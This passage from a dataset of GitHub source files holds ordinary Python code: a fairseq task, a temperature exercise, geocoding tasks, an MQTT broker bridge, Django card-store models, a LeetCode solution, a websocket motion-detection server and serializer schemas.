source_dictionary(self):\n return self.dictionary\n\n @property\n def target_dictionary(self):\n return self.dictionary\n\n def create_dummy_batch(self, device):\n dummy_target = (\n torch.zeros(self.cfg.mt_beam, EVAL_BLEU_ORDER * 2 + 3).long().to(device)\n if not self.cfg.eval_ter\n else torch.zeros(self.cfg.mt_beam, 3).long().to(device)\n )\n\n return {\n \"id\": torch.zeros(self.cfg.mt_beam, 1).long().to(device),\n \"net_input\": {\n \"src_tokens\": torch.zeros(self.cfg.mt_beam, 4).long().to(device),\n \"src_lengths\": torch.ones(self.cfg.mt_beam, 1).long().to(device),\n },\n \"nsentences\": 0,\n \"ntokens\": 0,\n \"target\": dummy_target,\n }\n\n def train_step(\n self, sample, model, criterion, optimizer, update_num, ignore_grad=False\n ):\n if ignore_grad and sample is None:\n sample = self.create_dummy_batch(model.device)\n\n return super().train_step(\n sample, model, criterion, optimizer, update_num, ignore_grad\n )\n\n def valid_step(self, sample, model, criterion):\n if sample is None:\n sample = self.create_dummy_batch(model.device)\n\n loss, sample_size, logging_output = super().valid_step(sample, model, criterion)\n\n if not self.cfg.eval_target_metric:\n return loss, sample_size, logging_output\n\n scores = logging_output[\"scores\"]\n\n if self.cfg.target_metric == \"bleu\":\n assert sample[\"target\"].shape[1] == EVAL_BLEU_ORDER * 2 + 3, (\n \"target does not contain enough information (\"\n + str(sample[\"target\"].shape[1])\n + \"for evaluating BLEU\"\n )\n\n max_id = torch.argmax(scores, dim=1)\n select_id = max_id + torch.arange(\n 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam\n ).to(max_id.device)\n bleu_data = sample[\"target\"][select_id, 1:].sum(0).data\n\n logging_output[\"_bleu_sys_len\"] = bleu_data[0]\n logging_output[\"_bleu_ref_len\"] = bleu_data[1]\n\n for i in range(EVAL_BLEU_ORDER):\n logging_output[\"_bleu_counts_\" + str(i)] = bleu_data[2 + i]\n logging_output[\"_bleu_totals_\" + str(i)] = bleu_data[\n 2 + EVAL_BLEU_ORDER + i\n ]\n\n elif self.cfg.target_metric == \"ter\":\n assert sample[\"target\"].shape[1] == 3, (\n \"target does not contain enough information (\"\n + str(sample[\"target\"].shape[1])\n + \"for evaluating TER\"\n )\n\n max_id = torch.argmax(scores, dim=1)\n select_id = max_id + torch.arange(\n 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam\n ).to(max_id.device)\n ter_data = sample[\"target\"][select_id, 1:].sum(0).data\n\n logging_output[\"_ter_num_edits\"] = -ter_data[0]\n logging_output[\"_ter_ref_len\"] = -ter_data[1]\n\n return loss, sample_size, logging_output\n\n def reduce_metrics(self, logging_outputs, criterion):\n super().reduce_metrics(logging_outputs, criterion)\n\n if not self.cfg.eval_target_metric:\n return\n\n def sum_logs(key):\n return sum(log.get(key, 0) for log in logging_outputs)\n\n if self.cfg.target_metric == \"bleu\":\n counts, totals = [], []\n for i in range(EVAL_BLEU_ORDER):\n counts.append(sum_logs(\"_bleu_counts_\" + str(i)))\n totals.append(sum_logs(\"_bleu_totals_\" + str(i)))\n\n if max(totals) > 0:\n # log counts as numpy arrays -- log_scalar will sum them correctly\n metrics.log_scalar(\"_bleu_counts\", np.array(counts))\n metrics.log_scalar(\"_bleu_totals\", np.array(totals))\n metrics.log_scalar(\"_bleu_sys_len\", sum_logs(\"_bleu_sys_len\"))\n metrics.log_scalar(\"_bleu_ref_len\", sum_logs(\"_bleu_ref_len\"))\n\n def compute_bleu(meters):\n import inspect\n import sacrebleu\n\n fn_sig = inspect.getfullargspec(sacrebleu.compute_bleu)[0]\n if \"smooth_method\" in fn_sig:\n smooth = {\"smooth_method\": \"exp\"}\n else:\n smooth = {\"smooth\": \"exp\"}\n bleu = sacrebleu.compute_bleu(\n correct=meters[\"_bleu_counts\"].sum,\n total=meters[\"_bleu_totals\"].sum,\n sys_len=meters[\"_bleu_sys_len\"].sum,\n ref_len=meters[\"_bleu_ref_len\"].sum,\n **smooth,\n )\n return round(bleu.score, 2)\n\n metrics.log_derived(\"bleu\", compute_bleu)\n elif self.cfg.target_metric == \"ter\":\n num_edits = sum_logs(\"_ter_num_edits\")\n ref_len = sum_logs(\"_ter_ref_len\")\n\n if ref_len > 0:\n metrics.log_scalar(\"_ter_num_edits\", num_edits)\n metrics.log_scalar(\"_ter_ref_len\", ref_len)\n\n def compute_ter(meters):\n score = meters[\"_ter_num_edits\"].sum / meters[\"_ter_ref_len\"].sum\n return round(score.item(), 2)\n\n metrics.log_derived(\"ter\", compute_ter)\n","repo_name":"facebookresearch/fairseq","sub_path":"examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py","file_name":"discriminative_reranking_task.py","file_ext":"py","file_size_in_byte":17561,"program_lang":"python","lang":"en","doc_type":"code","stars":28050,"dataset":"github-code","pt":"62"} +{"seq_id":"23219379449","text":"from math import inf\n\"\"\"maior = -321\nmenor = 321\"\"\"\nb = '='*35\nmaior = -inf\nmenor = inf\nctemp = 0\nsomat = 0\ntem = 'S'\nwhile tem == 'S':\n temp = float(input('Qual foi a temperatura registrada ? '))\n if temp > maior:\n maior=temp\n if temp < menor:\n menor = temp\n tem = str(input('Deseja mais incluir uma temperatura ? (utilize S para sim)')).upper()\n somat += temp\n ctemp +=1\nprint (f'{b}\\nForam Registradas {ctemp} temperaturas\\nA maior temperatura registrada foi {maior}ºC\\nA menor temperatura registrada foi {menor} ºC\\nA média Final das temperaturas foi de : {somat/ctemp:.2f} ºC\\n{b}')\n","repo_name":"Davisnts/AulasDeADS","sub_path":"Exercicios02/Ex010.py","file_name":"Ex010.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74277279557","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTasks for georeferencing tables\n\"\"\"\n\nfrom pathlib import Path\nfrom time import time\nfrom typing import List, Tuple\nfrom uuid import uuid4\n\nimport basedosdados as bd\nfrom geopy.extra.rate_limiter import RateLimiter\nfrom geopy.geocoders import Nominatim\nfrom geopy.location import Location\nimport pandas as pd\nfrom prefect import task\n\nfrom pipelines.utils.georeference.utils import check_if_belongs_to_rio\nfrom pipelines.utils.utils import log\n\n\n@task\ndef validate_georeference_mode(mode: str) -> None:\n \"\"\"\n Validates georeference mode\n \"\"\"\n if mode not in [\n \"distinct\",\n # insert new modes here\n ]:\n raise ValueError(\n f\"Invalid georeference mode: {mode}. Valid modes are: distinct\"\n )\n\n\n@task(nout=2)\ndef get_new_addresses( # pylint: disable=too-many-arguments, too-many-locals\n source_dataset_id: str,\n source_table_id: str,\n source_table_address_column: str,\n destination_dataset_id: str,\n destination_table_id: str,\n georef_mode: str,\n current_flow_labels: List[str],\n) -> Tuple[pd.DataFrame, bool]:\n \"\"\"\n Get new addresses from source table\n \"\"\"\n\n new_addresses = pd.DataFrame(columns=[\"address\"])\n exists_new_addresses = False\n\n source_table_ref = f\"{source_dataset_id}.{source_table_id}\"\n destination_table_ref = f\"{destination_dataset_id}.{destination_table_id}\"\n billing_project_id = current_flow_labels[0]\n\n if georef_mode == \"distinct\":\n query_source = f\"\"\"\n SELECT DISTINCT\n {source_table_address_column}\n FROM\n `{source_table_ref}`\n \"\"\"\n\n query_destination = f\"\"\"\n SELECT DISTINCT\n address\n FROM\n `{destination_table_ref}`\n \"\"\"\n\n source_addresses = bd.read_sql(\n query_source, billing_project_id=billing_project_id, from_file=True\n )\n source_addresses.columns = [\"address\"]\n try:\n destination_addresses = bd.read_sql(\n query_destination, billing_project_id=billing_project_id, from_file=True\n )\n destination_addresses.columns = [\"address\"]\n except Exception: # pylint: disable=broad-except\n destination_addresses = pd.DataFrame(columns=[\"address\"])\n\n # pylint: disable=invalid-unary-operand-type\n new_addresses = source_addresses[\n ~source_addresses.isin(destination_addresses)\n ].dropna()\n exists_new_addresses = not new_addresses.empty\n\n return new_addresses, exists_new_addresses\n\n\n@task\ndef georeference_dataframe(\n new_addresses: pd.DataFrame, log_divider: int = 60\n) -> pd.DataFrame:\n \"\"\"\n Georeference all addresses in a dataframe\n \"\"\"\n start_time = time()\n\n all_addresses = new_addresses[\"address\"].tolist()\n all_addresses = [f\"{address}, Rio de Janeiro\" for address in all_addresses]\n\n geolocator = Nominatim(user_agent=\"prefeitura-rio\")\n geocode = RateLimiter(geolocator.geocode, min_delay_seconds=1)\n\n log(f\"There are {len(all_addresses)} addresses to georeference\")\n\n locations: List[Location] = []\n for i, address in enumerate(all_addresses):\n if i % log_divider == 0:\n log(f\"Georeferencing address {i} of {len(all_addresses)}...\")\n location = geocode(address)\n locations.append(location)\n\n geolocated_addresses = [\n {\n \"latitude\": location.latitude,\n \"longitude\": location.longitude,\n }\n if location is not None\n else {\"latitude\": None, \"longitude\": None}\n for location in locations\n ]\n\n output = pd.DataFrame(geolocated_addresses)\n output[\"address\"] = new_addresses[\"address\"]\n output[[\"latitude\", \"longitude\"]] = output.apply(\n lambda x: check_if_belongs_to_rio(x.latitude, x.longitude),\n axis=1,\n result_type=\"expand\",\n )\n\n log(f\"--- {(time() - start_time)} seconds ---\")\n\n return output\n\n\n@task\ndef dataframe_to_csv(dataframe: pd.DataFrame, filename: str = \"data.csv\") -> None:\n \"\"\"\n Save dataframe to csv\n \"\"\"\n filename = filename if filename.endswith(\".csv\") else f\"{filename}.csv\"\n temp_filename = Path(f\"/tmp/{uuid4()}/{filename}\")\n temp_filename.parent.mkdir(parents=True, exist_ok=True)\n dataframe.to_csv(temp_filename, index=False)\n return str(temp_filename.parent)\n","repo_name":"prefeitura-rio/pipelines","sub_path":"pipelines/utils/georeference/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"62"} +{"seq_id":"19626053328","text":"import time\nimport logging\nimport paho.mqtt.client as mqtt\nimport traceback\nimport json\n\nimport sys\nfrom os import getenv, environ\n\nlogging.basicConfig(filename='recv_client.log', level=logging.INFO, filemode='w')\n\n\ndef connect(client_name, broker_adress, port=1883):\n mqttc = mqtt.Client(client_name, True)\n mqttc.on_connect = on_connect # attach function to callback\n mqttc.on_message = on_message # attach function to callback\n mqttc.connect(broker_adress, port) # connect to broker\n mqttc.loop_start() # start loop to process callback\n time.sleep(4) # wait for connection setup to complete\n\n return mqttc\n\n\ndef on_connect(client, userdata, flags, rc):\n \"\"\"\n The callback for when the client receives a CONNACK response from the server.\n \"\"\"\n if rc == 0:\n client.subscribe(topic_subscribe)\n print(\"connected OK with returned code=\", rc)\n else:\n print(\"Bad connection with returned code=\", rc)\n\ndef on_message(client, userdata, msg):\n \"\"\"\n The callback for when a PUBLISH message is received from the server\n \"\"\"\n\n message = json.loads(msg.payload)\n print(\"---------------------------------------------------------------\")\n readings = message['readings']\n readings['ts'] = json.loads(\"\".join(readings[\"ts\"].split(\"\\\\\")))\n readings['data'] = json.loads(readings[\"data\"])\n readings = [readings]\n print(readings)\n\n if readings:\n try:\n sogno_msg = json.dumps(readings)\n #mqttc_sogno.connect(broker_address_rabbitmq, port_rabbitmq)\n mqttc_sogno.publish(topic_publish, sogno_msg, 0)\n\n\t # Finished message\n print(\"Finished sending message \" )\n\n except Exception as e:\n print(e)\n traceback.print_tb(e.__traceback__)\n sys.exit()\n\nif len(sys.argv) != 4:\n print(\"Specify three argument\")\n sys.exit()\n\nclient_name = \"sogno_fledge_adapter\"\ntopic_subscribe = sys.argv[1]\ntopic_publish = \"/dpsim-powerflow\"\n\n# Local SOGNO platform broker\nbroker_address_rabbitmq = getenv('MQTT_RABBITMQ_BROKER', 'localhost')\nport_rabbitmq = int(getenv('MQTT_RABBITMQ_PORT','1883'))\n\n# Local Fledge platform broker\nbroker_address_emqx = sys.argv[2]\nport_emqx = int(sys.argv[3])\n\nmqttc_sogno = mqtt.Client()\nif 'MQTT_RABBITMQ_USER' in environ:\n mqttc_sogno.username_pw_set(getenv('MQTT_RABBITMQ_USER'), getenv('MQTT_RABBITMQ_PWD'))\nmqttc_sogno.connect(broker_address_rabbitmq, port_rabbitmq)\nmqttc_sogno.loop_start()\n\nmqttc_fledge = connect(client_name, broker_address_emqx, port_emqx)\n\nprint(\"Press CTRL+C to stop client...\")\n\nmqttc_fledge.publish(\"/debug\", \"SE started\")\n\ntry:\n while 1:\n time.sleep(1)\n # ensure debug ouput gets flushed\n sys.stdout.flush()\n\nexcept KeyboardInterrupt:\n print('Exiting...')\n mqttc_fledge.loop_stop()\n mqttc_fledge.disconnect()\n mqttc_sogno.loop_stop()\n mqttc_sogno.disconnect()\n sys.exit(0)\n","repo_name":"EdgeGallery/plugins","sub_path":"sogno/fledge-sogno-adapter/fledge-plugin.py","file_name":"fledge-plugin.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"62"} +{"seq_id":"17807357780","text":"from rest_framework import serializers\n\nfrom products.models import Product, ProductImage\n\n\nclass ProductImageSerializer(serializers.ModelSerializer):\n \"\"\"serializes a product image model obj\"\"\"\n image_url = serializers.SerializerMethodField(read_only=True)\n image = serializers.ImageField(required=False, write_only=True)\n\n class Meta:\n model = ProductImage\n fields = (\"id\", \"image_url\", \"image\", \"image_code\")\n read_only_fields = (\"id\",)\n\n def get_image_url(self, instance):\n \"\"\"returns absolute url of image\"\"\"\n request = self.context.get(\"request\")\n if hasattr(instance, \"image\"):\n image_url = instance.image.url\n return request.build_absolute_uri(image_url)\n return None\n\n def create(self, validated_data):\n \"\"\"creates a new image details obj in DB\"\"\"\n image_code = validated_data[\"image_code\"]\n if image_code:\n image = ProductImage.objects.filter(image_code=image_code).first()\n if image:\n error = {\n \"message\": f\"Product with code ({image_code}) exists\"\n }\n raise serializers.ValidationError(error, code=\"validation\")\n\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n validated_data.pop(\"request_user\")\n else:\n request_user = validated_data.pop(\"request_user\")\n\n validated_data[\"created_by\"] = request_user.id\n validated_data[\"updated_by\"] = request_user.id\n product_image = ProductImage.objects.create(**validated_data)\n if len(product_image.image_code) == 0:\n product = validated_data[\"product\"]\n product_image.image_code = f\"{product.product_code}-{product_image.id}\"\n product_image.save()\n return product_image\n\n def update(self, instance, validated_data):\n \"\"\"updates a product image instance in db with validated data\"\"\"\n image_code = validated_data[\"image_code\"]\n if image_code:\n image = ProductImage.objects.filter(image_code=image_code).first()\n if image:\n error = {\n \"message\": f\"Product with code ({image_code}) exists\"\n }\n raise serializers.ValidationError(error, code=\"validation\")\n\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n validated_data.pop(\"request_user\")\n else:\n request_user = validated_data.pop(\"request_user\")\n\n instance.product = validated_data.get(\"product_id\", instance.product)\n instance.image = validated_data.get(\"image\", instance.image)\n instance.image_code = validated_data.get(\"image_code\", instance.image_code)\n instance.is_main_image = validated_data.get(\"is_main_image\", instance.is_main_image)\n instance.updated_on = validated_data[\"updated_on\"]\n instance.updated_by = request_user.id\n instance.save()\n return instance\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n \"\"\"serializes product objects\"\"\"\n created_on = serializers.DateTimeField(required=False)\n updated_on = serializers.DateTimeField(required=False)\n\n class Meta:\n model = Product\n fields = (\n \"id\", \"name\", \"product_code\", \"price\", \"cost\", \"is_service\", \"created_on\", \"updated_on\",\n \"created_by\", \"updated_by\", \"is_deleted\", \"is_available\", \"units_available\", \"category\"\n )\n read_only_fields = (\"id\", \"created_by\", \"updated_by\")\n\n def create(self, validated_data):\n \"\"\"creates a new product with validated data\"\"\"\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n else:\n request_user = validated_data.pop(\"request_user\")\n\n validated_data[\"created_by\"] = request_user.id\n validated_data[\"updated_by\"] = request_user.id\n validated_data[\"is_available\"] = True\n product = Product.objects.create(**validated_data)\n return product\n\n def update(self, instance, validated_data):\n \"\"\"updates a product obj\"\"\"\n request = self.context.get(\"user\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n else:\n request_user = validated_data.pop(\"request_user\")\n instance.name = validated_data.get(\"name\", instance.name)\n instance.price = validated_data.get(\"price\", instance.price)\n instance.cost = validated_data.get(\"cost\", instance.cost)\n instance.product_code = validated_data.get(\"product_code\", instance.product_code)\n instance.is_service = validated_data.get(\"is_service\", instance.is_service)\n instance.updated_on = validated_data.get(\"updated_on\", instance.updated_on)\n instance.is_deleted = validated_data.get(\"is_deleted\", instance.is_deleted)\n instance.is_available = validated_data.get(\"is_available\", instance.is_available)\n instance.category = validated_data.get(\"category\", instance.category)\n instance.units_available = validated_data.get(\"units_available\", instance.units_available)\n\n instance.updated_by = request_user.id\n instance.save()\n return instance\n","repo_name":"venky-web/tailors-rest-api","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"16147606907","text":"#\n# @lc app=leetcode id=261 lang=python3\n#\n# [261] Graph Valid Tree\n#\n\n# @lc code=start\nimport collections\nclass Solution:\n def validTree(self, n: int, edges):\n if len(edges) != n - 1:\n return False\n neighbors = collections.defaultdict(list)\n for item in edges:\n neighbors[item[0]].append(item[1])\n neighbors[item[1]].append(item[0])\n visited = set()\n q = collections.deque([0])\n while q:\n curele = q.popleft()\n visited.add(curele)\n for node in neighbors[curele]:\n if node not in visited:\n visited.add(node)\n q.append(node)\n return len(visited) == n\n\nif __name__ == '__main__':\n a = Solution()\n b = a.validTree(5, [[0,1],[1,2],[2,3],[1,3],[1,4]])\n print(b) \n# @lc code=end\n\n","repo_name":"610yilingliu/leetcode","sub_path":"Python3/261.graph-valid-tree.py","file_name":"261.graph-valid-tree.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"31203943091","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\ndef validate_positive(value):\n if value < 0:\n raise ValidationError(\n _('%(value)s is not a positive number'),\n params={'value': value},\n )\n\n\nclass MTGSet(models.Model):\n # primary_key\n expansion_code = models.CharField(\n max_length = 3,\n primary_key=True\n )\n\n set_name = models.CharField(\n max_length = 20,\n )\n\n set_size = models.PositiveIntegerField()\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.set_name\n\n\nclass MTGCard(models.Model):\n\n CARD_TYPE_CHOICES = (\n ('Artifact', 'Artifact'),\n ('Creature', 'Creature'),\n ('Enchantment', 'Enchantment'),\n ('Instant', 'Instant'),\n ('Land', 'Land'),\n ('Legendary', 'Legendary'),\n ('Planeswalker', 'Planeswalker'),\n ('Sorcery', 'Sorcery'),\n )\n\n COLOR_CHOICES = (\n ('W', 'White'),\n ('U', 'Blue'),\n ('B', 'Black'),\n ('R', 'Red'),\n ('G', 'Green'),\n )\n\n RARITY_CHOICES = (\n ('B', 'Basic'),\n ('C', 'Common'),\n ('U', 'Uncommon'),\n ('R', 'Rare'),\n ('M', 'Mythic Rare')\n )\n\n\n # First 3: set expansion code, last 3: card number\n SKU_ID = models.CharField(\n max_length = 6,\n primary_key=True\n )\n\n card_name = models.CharField(\n max_length = 30,\n )\n\n set = models.ForeignKey(\n 'MTGSet',\n on_delete=models.SET_NULL,\n null=True)\n\n number = models.PositiveIntegerField()\n\n rarity = models.CharField(\n max_length = 1,\n choices = RARITY_CHOICES,\n )\n\n color = models.CharField(\n max_length = 1,\n choices = COLOR_CHOICES,\n )\n\n card_type = models.CharField(\n max_length = 12,\n choices = CARD_TYPE_CHOICES,\n )\n\n card_subtype = models.CharField(\n max_length = 20,\n blank = True,\n )\n\n converted_cost = models.PositiveIntegerField()\n\n rule_text = models.TextField(\n max_length = 400,\n blank = True,\n )\n\n image = models.CharField(\n max_length = 100,\n blank = True,)\n\n class Meta:\n ordering = ['card_name']\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.card_name\n\n def get_absolute_url(self):\n \"\"\"Returns the url to access a detail record for this book.\"\"\"\n return reverse('mtgcard-detail', args=[str(self.pk)])\n\n\nclass MTGSingle(models.Model):\n\n CONDITION_CHOICES = (\n ('NM', 'Near Mint'),\n ('LP', 'Lightly Played'),\n ('MP', 'Moderately Played'),\n ('HP', 'Heavily Played'),\n ('DM', 'Damaged'),\n )\n\n LANGUAGE_CHOICE = (\n ('EN', 'English'),\n ('SP', 'Spanish'),\n ('FR', 'French'),\n ('DE', 'German'),\n ('IT', 'Italian'),\n ('PT', 'Portuguese'),\n ('JP', 'Japanese'),\n ('KR', 'Korean'),\n ('RU', 'Russian'),\n ('CS', 'Simplified Chinese'),\n ('CT', 'Traditional Chinese'),\n )\n\n SKU_ID = models.ForeignKey(\n 'MTGCard',\n on_delete=models.SET_NULL,\n null=True)\n\n condition = models.CharField(\n max_length = 2,\n choices = CONDITION_CHOICES,\n )\n\n language = models.CharField(\n max_length = 2,\n choices = LANGUAGE_CHOICE,\n )\n\n qty = models.IntegerField(\n default = 0,\n )\n\n price = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n class Meta:\n unique_together = (('SKU_ID', 'condition', 'language'),)\n ordering = ['language','condition']\n\n def card_name(self):\n return self.SKU_ID.card_name\n\n def set(self):\n return self.SKU_ID.set\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.SKU_ID.SKU_ID + self.condition + self.language\n\n\nclass Order(models.Model):\n\n STATUS_CHOICES = (\n ('H', 'On Hold'),\n ('C', 'Completed'),\n )\n\n order_id = models.PositiveIntegerField(\n primary_key=True\n )\n\n customer_id = models.CharField(\n max_length = 20\n )\n\n total_price = models.DecimalField(\n max_digits=7,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return str(self.order_id)\n\n\nclass OrderItem(models.Model):\n\n order_id = models.ForeignKey(\n 'Order',\n on_delete=models.SET_NULL,\n null=True)\n\n product = models.ForeignKey(\n 'MTGSingle',\n on_delete=models.SET_NULL,\n null=True)\n\n qty = models.PositiveIntegerField(\n default = 0,\n )\n\n total_price = models.DecimalField(\n max_digits=7,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return str(self.pk)\n","repo_name":"MrRassoules/Gamer-Craze-Database","sub_path":"GamerCrazeProject/inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21586332299","text":"import websockets\nimport asyncio\nimport cv2\nimport base64\nimport json\n\ncap = cv2.VideoCapture(0)\n\nport = 5000\nprint(\"Started server on port : \", port)\n\nasync def transmit(websocket, path):\n print(\"Client Connected !\")\n try :\n fourcc = cv2.VideoWriter_fourcc('X','V','I','D')\n out = cv2.VideoWriter(\"output.avi\", fourcc, 5.0, (1280,720))\n ret, frame1 = cap.read()\n ret, frame2 = cap.read()\n\n while cap.isOpened():\n color = \"\"\n \n # Create outline\n ret, frame = cap.read()\n if ret == True:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n edges_high_thresh = cv2.Canny(gray, 60, 120)\n\n #Create movement detection \n diff = cv2.absdiff(frame1, frame2)\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5,5), 0)\n _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)\n dilated = cv2.dilate(thresh, None, iterations=3)\n contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n\n if cv2.contourArea(contour) < 7000:\n continue\n cv2.rectangle(frame1, (x, y), (x+w, y+h), (0, 255, 0), 2)\n cv2.putText(frame1, \"Status: {}\".format('Moving'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,\n 1, (0, 0, 255), 3) \n color = \"white\"\n\n image = cv2.resize(frame1, (620, 360))\n out.write(image) \n frame1 = frame2\n ret, frame2 = cap.read()\n\n if cv2.waitKey(40) == 27:\n break\n \n out.release() \n \n encoded_first = cv2.imencode('.jpg', image)[1]\n data_first = str(base64.b64encode(encoded_first))\n data_first = data_first[2:len(data_first)-1]\n\n encoded_second = cv2.imencode('.jpg', edges_high_thresh)[1]\n data_second = str(base64.b64encode(encoded_second))\n data_second = data_second[2:len(data_second)-1]\n\n result = {\n \"first_section\": data_first,\n \"second_section\": data_second,\n \"color\": color\n }\n\n response = json.dumps(result)\n await websocket.send(response)\n cap.release()\n except websockets.connection.ConnectionClosed as e:\n print(\"Client Disconnected !\")\n cap.release()\n except:\n print(\"Someting went Wrong !\")\n\nstart_server = websockets.serve(transmit, host=\"localhost\", port=port)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\ncap.release()","repo_name":"NjrexUI/quest-ai","sub_path":"App/lib/data/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15647309944","text":"from tkinter import*\nimport tkinter.font\nfrom gpiozero import LED\nimport RPi.GPIO\nRPi.GPIO.setmode(RPi.GPIO.BCM)\n\n### Hardware ###\nredled = LED(14)\ngreenled = LED(18)\nblueled = LED(24)\n\n### GUI Definitons ###\nwin = Tk()\nwin.title(\"5.2C\")\nmyFont = tkinter.font.Font(family = 'Helvetica', size = 12, weight = \"bold\")\nframe = Frame(win)\nframe.pack()\nr = StringVar(win,\"red\")\n\n### Event Functions ###\ndef GreenledToggle():\n greenled.on()\n redled.off()\n blueled.off()\n \ndef BlueledToggle():\n blueled.on()\n redled.off()\n greenled.off()\n \n \ndef RedledToggle():\n redled.on()\n blueled.off()\n greenled.off()\n \ndef close():\n RPi.GPIO.cleanup()\n win.destroy()\n \n### Widgets ###\nredledButton = Radiobutton(frame, text = 'Turn RED LED ON', font = myFont, command = RedledToggle, variable = r, value = 1)\nredledButton.pack(anchor = W)\n\ngreenledButton = Radiobutton(frame, text = 'Turn GREED LED ON', font = myFont, command = GreenledToggle, variable = r, value = 2)\ngreenledButton.pack(anchor = W)\n\nblueledButton = Radiobutton(frame, text = 'Turn BLUE LED ON', font = myFont, command = BlueledToggle, variable = r, value = 3)\nblueledButton.pack(anchor = W)\n\nexitButton = Button(win, text = 'Exit', font = myFont, command = close, bg = 'red', height = 1, width = 6)\nexitButton.pack(padx = 5, pady = 5)\n\n### Exit cleanly ###\nwin.protocol(\"WM_DELETE WINDOW\", close)\n\n### Loop forever ###\nwin.mainloop()\n \n","repo_name":"NitinDogra007/SIT210-Task5.2C-RPiGUI","sub_path":"5.2C RB.py","file_name":"5.2C RB.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38934884568","text":"import ImportMessage\nimport NPositionGram\nimport FrequentItemMining\n\n\ndef build_matrix(message_type,close_ngram):\n \"\"\"\n build the feature matrix to represent the messages\n :param message_type: a message list\n :param close_ngram: closed ngram list\n :return: feature matrix\n \"\"\"\n matrix = [[0 for i in range(len(close_ngram))] for j in range(len(message_type))]\n for i in range(len(message_type)):\n for j in range(len(close_ngram)):\n if close_ngram[j] in message_type[i]:\n matrix[i][j] = 1\n return matrix\n\n\nif __name__ == '__main__':\n a = ImportMessage.import_file('S7_1.pcap')\n b = ImportMessage.import_file('http.pcap')\n c = a + b\n # c = ImportMessage.import_file('DNS_packet.pcap')\n text_type, mixed_type, bin_type = ImportMessage.MessageClassifier(c)\n close_ngram = FrequentItemMining.get_close_ngram(text_type,'text',3,7,10,0.5)\n for i in range(len(close_ngram)):\n print(close_ngram[i])\n print(\"\")\n for message in mixed_type:\n print(message)\n feature_matrix = build_matrix(text_type,close_ngram)\n for i in range(len(feature_matrix)):\n print(feature_matrix[i])","repo_name":"liyihao17/FIMMC","sub_path":"FeatureBuild.py","file_name":"FeatureBuild.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32313498070","text":"#from marshmallow import Schema, fields, validate\n#from marshmallow.decorators import post_load\nfrom main.models.message_model import MessageModel\nfrom marshmallow_sqlalchemy import SQLAlchemyAutoSchema, fields\nfrom .user_schema import UserSchema\n\n\n'''class MessageSchema(Schema):\n id = fields.Int(dump_only = True)\n sender_id = fields.Int(required = True)\n receptor_id = fields.Int(required = True)\n message = fields.Str(required = True)\n #user = fields.Nested('users', many = True, exclude = ('message',))\n\n @post_load\n def make_message(self, data, **kwargs):\n return MessageModel(**data)'''\n\n\nclass MessageSchema(SQLAlchemyAutoSchema):\n class Meta:\n model = MessageModel\n load_instance = True\n include_relationships = True\n include_fk = True\n\n\n sender = fields.Nested((UserSchema), exclude =('nutritional_records', 'messages_sent', 'messages_recept',))\n receptor = fields.Nested((UserSchema), exclude =('nutritional_records', 'messages_sent', 'messages_recept',))\n\n\n\n\n","repo_name":"DaniBeato/ReNuDia","sub_path":"backend/main/maps/message_schema.py","file_name":"message_schema.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"17796568749","text":"import requests\nfrom bs4 import BeautifulSoup\nimport logging\nimport time\nimport os.path\nimport 